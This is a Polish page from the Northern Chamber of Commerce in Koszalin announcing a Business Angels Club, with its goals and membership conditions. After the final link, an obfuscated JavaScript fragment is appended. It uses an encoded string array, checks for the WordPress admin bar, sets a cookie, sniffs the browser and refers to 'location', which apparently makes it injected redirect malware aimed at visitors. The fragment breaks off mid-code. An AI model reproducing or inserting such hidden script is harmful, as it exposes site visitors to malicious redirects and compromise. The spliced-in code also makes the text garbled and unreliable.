Dołącz do Klubu Aniołów Biznesu! | Północna Izba Gospodarcza w Koszalinie

Klub Aniołów Biznesu – to platforma współpracy pomiędzy startupwcami, ludźmi którzy chcą założyć i rozwijać własny biznes, a potencjalnymi inwestorami, którzy gotowi są zainwestować swój kapitał, czas i doświadczenie w nowe pomysły biznesowe. „Aniołowie” to przeważnie przedsiębiorcy posiadający niebagatelne doświadczenie biznesowe oraz kapitał finansowy z zamiarem zainwestowania w startupy. Ważnym i często kluczowym elementem jest wsparcie „mentorskie” którego udzielają Aniołowie w decydujących dla istnienia i rozwoju młodego biznesu. Z kolei pomysłodawcy nowych projektów biznesowych to osoby które szukają wsparcia kapitałowego, ale także doświadczenia w prowadzeniu biznesu, mentora, który pomoże wdrożyć w życie pomysł i przekuć w sukces biznesowy.

Nasza inicjatywa wyróżnia się lokalnym w działaniem i znacznie łatwiejszym dostępem do „Anioła”. Działania Klubu rozpoczniemy od serii spotkań przedsiębiorców Północnej Izby Gospodarczej i nie tylko zainteresowanych lokowaniem kapitału i rozwojem nowych modeli biznesowych. Tam zostanie ustalony dalszy plan działań z wyznaczeniem terminu pierwszego spotkania otwartego ze startupowcami.

Za cele projektu stawiamy sobie między innymi:

  • Rozwój gospodarczy Koszalin oraz Pomorza Środkowego oraz kreowanie środowiska startupowego
  • Tworzenie warunków rozwoju i unowocześniania życia gospodarczego, wspieranie inicjatyw gospodarczych członków.
  • Wspieranie startupów w regionie.
  • Przyczynianie się do rozwoju lokalnej oraz regionalnej infrastruktury przedsiębiorczości.
  • Realizację przedsięwzięć na rzecz przedsiębiorców, współpracy przedsiębiorców z jednostkami naukowymi i szkołami.
  • Wspieranie i promowanie przedsiębiorczości w regionie.

Warunki przystąpienia:

  1. Złożenie deklaracji, załącznik nr 1 do Regulaminu.
  2. Akceptacja postanowień Regulaminu.
  3. Brak zaległości w składkach członkowskich do Północnej Izby Gospodarczej.
  4. Opłata 3 miesięcznej składki do KAB wysokimi 300 zł.

Więcej informacji na temat Klubu Aniołów Biznesu Refulamin oraz formularz zgłoszeniowy na pig.koszalin.pl/klub-aniolow-biznesu 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m